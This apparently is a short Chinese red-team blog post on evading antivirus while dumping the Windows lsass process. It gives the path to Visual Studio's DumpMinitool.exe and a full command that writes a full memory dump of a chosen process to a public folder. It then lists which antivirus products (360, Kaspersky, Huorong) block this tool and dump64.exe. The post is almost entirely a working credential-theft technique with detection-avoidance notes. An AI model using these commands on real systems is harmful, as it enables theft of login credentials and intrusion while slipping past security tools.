免杀技术-dump lsass实测
DumpMinitool.exe
经测试,360和卡巴拦截,火绒正常
Visual Studio 2022 的一个程序,使用这个需要安装扩展开发

1 | C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe |

使用命令
1 | DumpMinitool.exe --file c:\users\public\test.txt --processId PID --dumpType Full |

360拦截

卡巴斯基拦截

火绒不拦截

dump64.exe
卡巴斯基拦截,火绒和360不拦截
360不拦截

火绒不拦截

本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Hyyrent blog!







